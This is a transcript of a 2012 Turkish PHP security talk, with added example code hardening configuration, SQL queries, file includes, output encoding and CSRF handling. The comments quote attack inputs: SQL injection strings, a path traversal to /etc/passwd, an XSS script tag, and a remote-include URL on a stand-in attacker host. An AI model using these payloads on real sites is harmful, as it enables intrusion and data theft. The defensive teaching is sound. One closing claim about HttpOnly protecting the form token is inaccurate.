PHP Güvenlik Notları (PHP Security Notes)
Hidayet Doğan
November 07, 2012
XVII. Türkiye'de İnternet Konferansı (17th Internet in Turkey Conference) - Anadolu Üniversitesi, Eskişehir
Transcript
PHP Güvenlik Notları (PHP Security Notes) Friday, November 9, 12
PHP Security Notes: Code Readability, PHP Settings, SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF)
Code Readability
PHP Settings
Always: register_globals = Off (the directive was removed in PHP 5.4; on older versions it must be Off, because On lets any request parameter overwrite an arbitrary variable)
allow_url_include = Off; allow_url_fopen = Off unless remote URLs are genuinely needed
error_reporting = E_ALL, with display_errors = Off and log_errors = On in production, so errors reach the log but never the page
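The slide lists the directives by name; the following script, added here and not part of the deck, audits a running PHP installation against the production values those directives should carry. The expected values are the editor's assumptions about a production web server, not the deck's.

```php
<?php
// Added example, not from the deck: audit the running PHP configuration
// against a production baseline for the directives the slide names.
// The baseline values are the editor's assumptions, not the deck's.
declare(strict_types=1);

function expectedProductionSettings(): array
{
    return [
        // Removed in PHP 5.4; on older builds anything but Off lets request
        // parameters overwrite arbitrary variables.
        'register_globals'   => '0',
        'allow_url_include'  => '0',   // include('http://...') must never work
        'allow_url_fopen'    => '0',   // assumption: remote fopen() not needed here
        'display_errors'     => '0',   // paths and stack traces stay off the page
        'log_errors'         => '1',   // ... but do end up in the error log
        'error_reporting'    => (string) E_ALL,
    ];
}

// ini_get() returns "1"/"" or "On"/"Off" depending on how a value was set,
// so normalise boolean spellings before comparing.
function normaliseBool(string $v): string
{
    $lower = strtolower(trim($v));
    if (in_array($lower, ['1', 'on', 'true', 'yes'], true)) {
        return '1';
    }
    if (in_array($lower, ['0', 'off', 'false', 'no', ''], true)) {
        return '0';
    }
    return $lower; // numeric masks such as error_reporting compare as-is
}

/**
 * Compare ini_get() output with the expected values.
 * Returns human-readable findings; an empty array means the baseline is met.
 */
function auditIni(array $expected): array
{
    $findings = [];
    foreach ($expected as $directive => $want) {
        $have = ini_get($directive);
        if ($have === false) {
            // Directive unknown to this PHP build (register_globals on >= 5.4): nothing to check.
            continue;
        }
        if (normaliseBool($have) !== normaliseBool($want)) {
            $findings[] = sprintf('%s is "%s", expected "%s"', $directive, $have, $want);
        }
    }
    return $findings;
}

$findings = auditIni(expectedProductionSettings());
if ($findings === []) {
    echo "PHP configuration matches the production baseline\n";
} else {
    foreach ($findings as $f) {
        echo "WARNING: $f\n";
    }
}
```

Run it under the same SAPI as the application (php-fpm or mod_php, not only the CLI), since each SAPI can load a different php.ini.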
SQL Injection
SELECT * FROM tablo WHERE id = $id
register_globals = Off
mysql_real_escape_string, pg_escape_string, PDO (the mysql_* extension was removed in PHP 7.0; use PDO or mysqli prepared statements)
filter_input, filter_var
Typecasting: (integer) (boolean) (double) (float)
addslashes = Not enough! (it knows nothing about the connection character set, and it does nothing at all for an unquoted numeric $id)
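The slide's query beside the defences it lists, as an added example that is not code from the deck. The table and column names (tablo, id) follow the slide; the DSN and credentials are placeholders.

```php
<?php
// Added example, not code from the deck. Table/column names follow the slide;
// the DSN, database name and credentials are placeholders.
declare(strict_types=1);

$pdo = new PDO('mysql:host=localhost;dbname=ornek;charset=utf8mb4', 'user', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

// VULNERABLE (the slide's query): $id is spliced straight into the SQL text.
// ?id=1 OR 1=1 returns every row; ?id=1 UNION SELECT ... reads other tables.
function fetchUnsafe(PDO $pdo, string $id): array
{
    $sql = "SELECT * FROM tablo WHERE id = $id";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Defence 1: the slide's typecasting. Safe only because the column is numeric:
// (int) "1 OR 1=1" is 1, so the rest of the payload never reaches the server.
function fetchByIntCast(PDO $pdo, string $id): array
{
    $idInt = (int) $id;
    return $pdo->query("SELECT * FROM tablo WHERE id = $idInt")->fetchAll(PDO::FETCH_ASSOC);
}

// Defence 2: validate with filter_var and bind with a PDO prepared statement.
// The parameter never becomes part of the SQL text, so no escaping is involved.
function fetchPrepared(PDO $pdo, string $id): ?array
{
    $idInt = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($idInt === false) {
        return null; // reject garbage instead of silently coercing it to 0
    }
    $stmt = $pdo->prepare('SELECT * FROM tablo WHERE id = :id');
    $stmt->bindValue(':id', $idInt, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Why addslashes is not enough: it only escapes quotes, backslashes and NUL,
// so an injection into an unquoted numeric context passes through untouched.
$payload = '1 OR 1=1';
var_dump(addslashes($payload) === $payload); // the payload is unchanged

$result = fetchPrepared($pdo, $_GET['id'] ?? '');
echo $result === null ? "invalid id\n" : json_encode($result) . "\n";
```

The prepared statement is the defence to standardise on: it works for every column type, whereas the integer cast only covers numeric columns and the escaping functions depend on the connection character set being set correctly.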
Cross-site Scripting (XSS)
include($dosya);
echo $kullanicidan_gelen_veri;
register_globals = Off, allow_url_include = Off
basename, realpath, preg_match
htmlspecialchars, htmlentities, strip_tags
(The include($dosya) line is a file-inclusion problem rather than XSS: the first two mitigation rows address it, the last row addresses the echo.)
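Both slide snippets with their hardened forms, as an added example that is not code from the deck. The variable names follow the slide ($dosya is the file to include, $kullanicidan_gelen_veri the user-supplied data); the template directory, the page-name pattern and the sample input are the editor's assumptions.

```php
<?php
// Added example, not code from the deck. Variable names follow the slide;
// the templates directory, the allowed file-name pattern and the sample
// input below are assumptions made for the example.
declare(strict_types=1);

// --- File inclusion -----------------------------------------------------
// VULNERABLE: include($dosya) with $dosya taken from the request.
// ?dosya=../../../../etc/passwd reads local files; with allow_url_include=On,
// ?dosya=http://attacker.example/shell.txt runs remote code.

// Hardened: strip directories with basename(), restrict the alphabet with
// preg_match(), resolve with realpath() and accept only files under $baseDir.
function safeInclude(string $dosya, string $baseDir): bool
{
    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }
    $name = basename($dosya); // removes "../" components and URL schemes
    if (!preg_match('/\A[a-z0-9_-]+\.php\z/i', $name)) {
        return false;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath() follows symlinks, so verify the resolved path is still inside $base
    if ($path === false || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// --- Cross-site scripting -----------------------------------------------
// VULNERABLE: echo $kullanicidan_gelen_veri; with input such as
// "><script>alert(1)</script> the browser runs the script in the site's origin.

// Hardened: encode for the context being written. htmlspecialchars() with
// ENT_QUOTES covers element text and both single- and double-quoted attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $kullanicidan_gelen_veri): string
{
    return htmlspecialchars($kullanicidan_gelen_veri, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// strip_tags() is a different tool: it deletes markup (and legitimate text such
// as "a < b") rather than encoding it, so it is not a substitute for e() on output.
$input = '"><script>alert(1)</script>'; // constructed sample input
echo '<input value="' . e($input) . '">' . "\n";

var_dump(safeInclude($_GET['dosya'] ?? 'home.php', __DIR__ . '/templates'));
```

The encoding in e() is correct for HTML text and quoted attributes only; data written into a JavaScript string, a URL or a CSS value needs the encoder for that context.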
Cross-site Request Forgery (CSRF)
<img src="http://adres.com/gonder.php?yorum=Örnek">
Session-based verification keys (tokens)
$_SERVER['HTTP_REFERER'] check
Ajax: $_SERVER['HTTP_X_REQUESTED_WITH'] check
(The token is the primary defence; the two header checks are supporting measures only, since the Referer may be absent and X-Requested-With merely shows that a same-origin script set it.)
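The three defences from the slide applied to its gonder.php example, as an added example that is not code from the deck. The script name and the yorum parameter follow the slide; the session key, form field and expected host names are assumptions. random_bytes() needs PHP 7.0 and hash_equals() PHP 5.6.

```php
<?php
// Added example, not code from the deck. gonder.php and the "yorum" parameter
// follow the slide; the session key, form field and host name are assumptions.
// random_bytes() requires PHP 7.0, hash_equals() PHP 5.6.
declare(strict_types=1);

session_start();

// VULNERABLE pattern from the slide: gonder.php?yorum=... accepts a comment on
// a GET request, so <img src="http://adres.com/gonder.php?yorum=Örnek"> on any
// page the victim visits posts a comment with the victim's session cookie.

// Defence 1 (primary): a per-session token embedded in every form and checked
// on every state-changing request. hash_equals() avoids timing side channels.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfTokenIsValid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence 2 (supporting): the slide's header checks. Weaker than the token:
// the Referer may be stripped by proxies or privacy settings, and
// X-Requested-With only proves a same-origin XMLHttpRequest set it.
function refererIsSameOrigin(string $expectedHost): bool
{
    $host = parse_url($_SERVER['HTTP_REFERER'] ?? '', PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

function isAjaxRequest(): bool
{
    return ($_SERVER['HTTP_X_REQUESTED_WITH'] ?? '') === 'XMLHttpRequest';
}

// gonder.php: state changes only on POST with a valid token, so the GET-based
// <img> trick fails before any comment is stored.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit("CSRF token invalid\n");
    }
    $yorum = $_POST['yorum'] ?? '';
    // ... store $yorum here ...
    echo "comment accepted\n";
    exit;
}

// Render the form with the token; htmlspecialchars() keeps it attribute-safe.
$token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="gonder.php">
  <input type="hidden" name="csrf_token" value="{$token}">
  <textarea name="yorum"></textarea>
  <button>Send</button>
</form>
HTML;
```

Mark the session cookie HttpOnly and, on HTTPS sites, Secure, so the token in the form cannot be read by an attacker who has an XSS foothold elsewhere on the site.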
Questions?
PHP and Web Security flashcards!
Thanks! http://php.net/manual/tr/security.php http://shiflett.org/php-security.pdf http://hi.do http://github.com/hdogan Twitter @hdogan